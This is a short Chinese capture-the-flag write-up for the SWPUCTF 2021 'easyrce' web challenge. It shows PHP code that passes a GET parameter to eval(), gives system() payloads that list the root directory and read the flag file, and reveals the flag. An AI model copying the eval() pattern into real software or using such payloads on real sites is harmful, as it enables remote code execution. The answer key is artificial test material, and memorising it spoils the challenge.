[SWPUCTF 2021 新生赛]easyrce
[SWPUCTF 2021 新生赛]easyrce
题目来源:nssctf
题目类型:web
涉及考点:命令执行
1. 题目给了一串代码,直接代码审计
<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['url']))
{
eval($_GET['url']);
}
?>
eval():把字符串按照 PHP 代码来计算,需以分号结尾
即,我们通过GET传参,可以实现任意命令执行
2. 使用system函数
system(string $a):a为执行的命令,执行有回显,结果输出到页面上
- 查看目录:
/?url=system("ls /"); //'ls /'列出根目录下所有的文件夹和文件
注意要传入url编码
- cat 查看flag:
/?url=system("cat /flllllaaaaaaggggggg");
得到flag:
NSSCTF{38fa58d4-18fe-432d-ad46-705fedc020c7}
日期:2023.7.25
作者:y0Zero
